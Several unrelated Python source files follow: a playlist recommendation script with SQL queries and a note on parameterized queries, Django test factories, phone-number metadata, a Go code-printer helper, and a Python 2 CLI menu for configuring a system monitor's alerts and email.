"from ListenedTo L inner join Track T on L.track=T.id inner join TrackBelongsToCategory C on T.id=C.track "
"where user='{}' "
"group by C.category "
"order by n desc "
"limit 2"
)
GET_TRACKS = (
"select C.track "
"from TrackBelongsToCategory C "
"where C.category='{}' "
)
# GETTING ALL USERS
cursor.execute(GET_USERS_QUERY)
users = cursor.fetchall() # every user is a tuple (user_id,playlist_id)
for user in users:
# remove the tracks from the playlist so it can be refreshed
cursor.execute(REMOVE_TRACK.format(user[1]))
# get the last 5 tracks the user liked
cursor.execute(GET_LIKED_TRACK.format(user[0]))
tracks = cursor.fetchall()
tracks = list(map(lambda x: x[0], tracks)) # from tuple to string
track_set = []
for track in tracks:
# for each track, get the 3 most similar ones
cursor.execute(GET_SIMILAR_TRACK.format(track, track))
similarity = cursor.fetchall()
similarity = list(
map(lambda x: x[0] if x[1] == track else x[1], similarity))
track_set = track_set+similarity
suggested = list(set(track_set)) # build a set to remove duplicates
n = 5 if len(suggested) > 5 else len(suggested)
for i in range(n):
t = random.choice(suggested) # add 5 of them at random
suggested.remove(t)
cursor.execute(INSERT_TRACK.format(t, user[1]))
cursor.execute(GET_MOST_LISTENED_GENRES.format(user[0]))
genres = cursor.fetchall()
genres = list(map(lambda x: x[0], genres))
track_set = []
for genre in genres:
cursor.execute(GET_TRACKS.format(genre))
tracks = cursor.fetchall()
tracks = list(map(lambda x: x[0], tracks))
track_set = track_set + tracks
suggested = list(set(track_set))
n = 15 if len(suggested) > 15 else len(suggested)
for i in range(n):
t = random.choice(suggested) # add up to 15 of them at random
suggested.remove(t)
cursor.execute(INSERT_TRACK.format(t, user[1]))
connection.commit()
connection.close()
|
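# Design note on the script above: the queries are built with str.format, which
# works here because the interpolated IDs come from the database itself, but
# mysql.connector also accepts parameterized queries so the driver handles the
# quoting. A hedged sketch reusing the cursor/user/t names from the script:
cursor.execute(
    "delete from TrackBelongsToPlaylist where playlist = %s",
    (user[1],),
)
cursor.execute(
    "insert ignore into TrackBelongsToPlaylist (track, playlist, addedDate) "
    "values (%s, %s, now())",
    (t, user[1]),
)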
py | b415d602f9fe7631d57fef8f65ef1a44bedc2f08 | from django.utils.text import slugify
import factory
from accounts.tests.factories import UserFactory
from pages.models import Category, Page
class CategoryFactory(factory.django.DjangoModelFactory):
title = factory.Faker('job')
slug = factory.LazyAttribute(lambda a: slugify(a.title))
class Meta:
model = Category
class PageFactory(factory.django.DjangoModelFactory):
title = factory.Faker('job')
url = factory.LazyAttribute(lambda a: '/{slug}/'.format(slug=slugify(a.title)))
category = factory.SubFactory(CategoryFactory)
created_by = factory.SubFactory(UserFactory)
updated_by = factory.LazyAttribute(lambda a: a.created_by)
class Meta:
model = Page
|
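# Short usage sketch for the factories above inside a Django TestCase; the
# import path pages.tests.factories is an assumption about the project layout.
from django.test import TestCase

from pages.tests.factories import PageFactory  # hypothetical module path


class PageFactoryTest(TestCase):
    def test_factory_builds_related_objects(self):
        page = PageFactory(title='Site Editor')
        self.assertEqual(page.url, '/site-editor/')          # LazyAttribute slug
        self.assertEqual(page.updated_by, page.created_by)   # shared user
        self.assertIsNotNone(page.category.slug)             # SubFactory category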
py | b415d7da010411c24a821c3cc9196f1bc98b55dc | """Auto-generated file, do not edit by hand. 800 metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_800 = PhoneMetadata(id='001', country_code=800, international_prefix=None,
general_desc=PhoneNumberDesc(national_number_pattern='\\d{8}', possible_number_pattern='\\d{8}', example_number='12345678'),
fixed_line=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA', example_number='12345678'),
mobile=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA', example_number='12345678'),
toll_free=PhoneNumberDesc(national_number_pattern='\\d{8}', possible_number_pattern='\\d{8}', example_number='12345678'),
premium_rate=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
shared_cost=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
personal_number=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voip=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
pager=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
uan=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
voicemail=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
no_international_dialling=PhoneNumberDesc(national_number_pattern='NA', possible_number_pattern='NA'),
number_format=[NumberFormat(pattern='(\\d{4})(\\d{4})', format=u'\\1 \\2')],
leading_zero_possible=True)
|
py | b415d85486328d5f888f520b5415af8dd55f6df0 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""
source_printer.py
prints Go functions
"""
class FunctionPrinter(object):
def __init__(self, ctx, clazz, leafs=None, children=None):
self.ctx = ctx
self.clazz = clazz
self.leafs = leafs
self.children = children
name = clazz.go_name()
identifier = '%s%s' % (name[0].lower(), name[1:])
if clazz.iskeyword(identifier):
identifier = "self"
self.class_alias = identifier
# This method should be called on any class inheriting FunctionPrinter
# which will print the function header and body defined in such class.
def print_all(self):
self.print_function_header()
self.print_function_body()
self.print_function_trailer()
def print_function_trailer(self):
self.ctx.lvl_dec()
self.ctx.writeln('}')
self.ctx.bline()
# This method is meant to assist in printing a function header by any
# class implementing FunctionPrinter or by the quick_print method.
def print_function_header_helper(self, name, args='', return_type=' '):
if return_type != ' ':
return_type = ' %s ' % return_type
self.ctx.writeln('func (%s *%s) %s(%s)%s{' % (
self.class_alias, self.clazz.qualified_go_name(),
name, args, return_type))
self.ctx.lvl_inc()
# This method is meant to be called to quickly print any getter/setter function
# to forgo defining a new class.
def quick_print(self, name, args='', return_type=' ', stmt='', return_stmt=''):
if return_type != ' ':
return_type = ' %s ' % return_type
if (return_stmt != ''):
stmt = 'return %s' % return_stmt
self.ctx.writeln('func (%s *%s) %s(%s)%s{ %s }' % (
self.class_alias,
self.clazz.qualified_go_name(),
name,
args,
return_type,
stmt))
self.ctx.bline()
|
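# What quick_print above emits for a one-line Go accessor, using the same format
# string; the receiver alias, type and field names here are hypothetical.
line = 'func (%s *%s) %s(%s)%s{ %s }' % (
    'acl', 'Ipv4Acl', 'GetFilter', '', ' string ', 'return acl.Filter')
print(line)  # func (acl *Ipv4Acl) GetFilter() string { return acl.Filter }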
py | b415d9596b568d6203fb0b2cb59c26785bfd623e | """
Interactive CLI menu module
"""
# Imports
import os # Os module for the 'clear' command.
import sys # Sys module for the 'exit' command.
import config # Config module for the setter functions.
import cron # Cron module for the crontab manipulations.
# Menu decorator
def menu_decorator(menu):
def wrapper():
# Header
os.system("clear")
print "Light System Monitor\n"
# Current menu
menu()
# Footer
print
# If the decorated function is a submenu:
if menu.__name__[:3] == "sub":
print "9. Back"
# Else if the decorated function is the main menu:
elif menu.__name__ == "menu_main":
print "0. Exit"
else:
print "0. Main menu"
choice = raw_input(">> ")
exec_menu(choice, menu.__name__)
return wrapper
# Main menu
@menu_decorator
def menu_main():
print "Please choose an option:"
print "1. Crontab configuration"
print "2. Alerts configuration"
print "3. Email configuration"
# Execute menu
def exec_menu(choice, current_menu):
# If the 'choice' action exists in the current menu's options,
# use it. Otherwise remain the in the current menu.
# This can be redone to use dict.get() method actually.
try:
menu_actions[current_menu][choice]()
except KeyError:
menu_actions[current_menu][current_menu]()
# Exit program
def app_exit():
os.system("clear")
sys.exit(0)
# Crontab menu
@menu_decorator
def menu_cron():
print "Crontab configuration\n"
if cron.is_set():
print "Crontab is set\n"
print "1. Add to crontab"
print "2. Remove from crontab"
# Add to crontab
def menu_cron_add():
cron.add()
exec_menu("menu_cron", "menu_cron")
# Remove from crontab
def menu_cron_remove():
cron.remove()
exec_menu("menu_cron", "menu_cron")
# Alerts menu
@menu_decorator
def menu_alerts():
print "Alerts configuration\n"
print "1. Processes"
print "2. Thresholds"
# Alerts - Processes sub-menu
@menu_decorator
def submenu_alerts_processes():
print "Alerts configuration -> Processes\n"
print "Watched processes: {}\n".format(", ".join(config.list_processes()))
print "1. Add process"
print "2. Remove process"
# Alerts - Processes - Add
@menu_decorator
def submenu_alerts_processes_add():
print "Alerts configuration -> Processes -> Add Process\n"
process = raw_input("Please enter a process to watch: ")
if config.add_process(process):
print "{} added to the watch list!".format(process)
else:
print "Failed to add!"
raw_input("Press enter to acknowledge.")
# TODO - Maybe there's no need for this output and it's easier to see the results in the parent menu.
exec_menu("submenu_alerts_processes", "submenu_alerts_processes")
# Alerts - Processes - Remove
@menu_decorator
def submenu_alerts_processes_remove():
print "Alerts configuration -> Processes -> Remove Process\n"
process = raw_input("Please enter a process to remove from watching: ")
if config.remove_process(process):
print "{} removed from the watch list!".format(process)
else:
print "Failed to remove!"
raw_input("Press enter to acknowledge.")
# TODO - Maybe there's no need for this output and it's easier to see the results in the parent menu.
exec_menu("submenu_alerts_processes", "submenu_alerts_processes")
# Alerts - Thresholds sub-menu
@menu_decorator
def submenu_alerts_thresholds():
print "Alerts configuration -> Thresholds\n"
print "1. Set CPU percentage threshold"
print "2. Set Memory percentage threshold"
print "3. Set Swap memory percentage threshold"
print "4. Set Core Temperature threshold"
# Alerts - Thresholds sub-menu - Set CPU
@menu_decorator
def submenu_alerts_thresholds_cpu():
print "Alerts configuration -> Thresholds -> CPU percentage\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_cpu_percent(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Alerts - Thresholds sub-menu - Set Memory
@menu_decorator
def submenu_alerts_thresholds_memory():
print "Alerts configuration -> Thresholds -> Memory percentage\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_memory_percent(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Alerts - Thresholds sub-menu - Set Swap
@menu_decorator
def submenu_alerts_thresholds_swap():
print "Alerts configuration -> Thresholds -> Swap percentage\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_swap_percent(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Alerts - Thresholds sub-menu - Core temperature
@menu_decorator
def submenu_alerts_thresholds_temp_core():
print "Alerts configuration -> Thresholds -> Core temperature\n"
threshold = raw_input("Please enter the new threshold: ")
config.set_temp_core(int(threshold))
exec_menu("submenu_alerts_thresholds", "submenu_alerts_thresholds")
# Email menu
@menu_decorator
def menu_email():
print "Email configuration\n"
print "1. Recipient address"
print "2. SMTP server"
# Email - Recipient sub-menus
@menu_decorator
def submenu_email_recipient():
print "Email configuration -> Recipient address\n"
print "Currently set address: {}\n".format(config.settings["email"]["address"])
print "1. Change address"
# Email - Change the recipient
@menu_decorator
def submenu_email_recipient_change():
print "Email configuration -> Recipient address -> Address change\n"
address = raw_input("Please enter a new address: ")
config.set_email(address)
exec_menu("submenu_email_recipient", "submenu_email_recipient")
# Email - SMTP sub-menus
@menu_decorator
def submenu_email_smtp():
print "Email configuration -> SMTP configuration\n"
print "Currently set server: {}".format(config.settings["email"]["smtp_server"])
print "Currently set username: {}".format(config.settings["email"]["smtp_user"])
print "Currently set password: {}\n".format(config.settings["email"]["smtp_pass"])
print "1. Change address"
print "2. Change username"
print "3. Change password"
# Email - Change the SMTP server
@menu_decorator
def submenu_email_smtp_change():
print "Email configuration -> SMTP configuration -> Server change\n"
server = raw_input("Please enter a new server domain name or IP: ")
config.set_smtp(server)
exec_menu("submenu_email_smtp", "submenu_email_smtp")
# Email - Change the SMTP username
@menu_decorator
def submenu_email_smtp_user():
print "Email configuration -> SMTP configuration -> Username change\n"
username = raw_input("Please enter a new SMTP username: ")
config.set_smtp_user(username)
exec_menu("submenu_email_smtp_user", "submenu_email_smtp_user")
# Email - Change the SMTP password
@menu_decorator
def submenu_email_smtp_pass():
print "Email configuration -> SMTP configuration -> Password change\n"
server = raw_input("Please enter a new SMTP password: ")
config.set_smtp_pass(server)
exec_menu("submenu_email_smtp_pass", "submenu_email_smtp_pass")
# Menu definition
menu_actions = {
"menu_main": {
"menu_main": menu_main,
"1": menu_cron,
"2": menu_alerts,
"3": menu_email,
"0": app_exit,
},
"menu_cron": {
"menu_cron": menu_cron,
"1": menu_cron_add,
"2": menu_cron_remove,
"0": menu_main,
},
"menu_alerts": {
"menu_alerts": menu_alerts,
"1": submenu_alerts_processes,
"2": submenu_alerts_thresholds,
"0": menu_main,
},
"submenu_alerts_processes": {
"submenu_alerts_processes": submenu_alerts_processes,
"1": submenu_alerts_processes_add,
"2": submenu_alerts_processes_remove,
"9": menu_alerts,
"0": menu_main,
},
"submenu_alerts_thresholds": {
"submenu_alerts_thresholds": submenu_alerts_thresholds,
"1": submenu_alerts_thresholds_cpu,
"2": submenu_alerts_thresholds_memory,
"3": submenu_alerts_thresholds_swap,
"4": submenu_alerts_thresholds_temp_core,
"9": menu_alerts,
"0": menu_main,
},
"menu_email": {
"menu_email": menu_email,
"1": submenu_email_recipient,
"2": submenu_email_smtp,
"0": menu_main,
},
"submenu_email_recipient": {
"submenu_email_recipient": submenu_email_recipient,
"1": submenu_email_recipient_change,
"9": menu_email,
"0": menu_main,
},
"submenu_email_smtp": {
"submenu_email_smtp": submenu_email_smtp,
"1": submenu_email_smtp_change,
"2": submenu_email_smtp_user,
"3": submenu_email_smtp_pass,
"9": menu_email,
"0": menu_main,
}
}
|
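# Following the "dict.get()" comment inside exec_menu above, a sketch of the
# same dispatch without try/except; behaviour for unknown choices is unchanged
# (the current menu is redrawn).
def exec_menu(choice, current_menu):
    actions = menu_actions[current_menu]
    action = actions.get(choice, actions[current_menu])
    action()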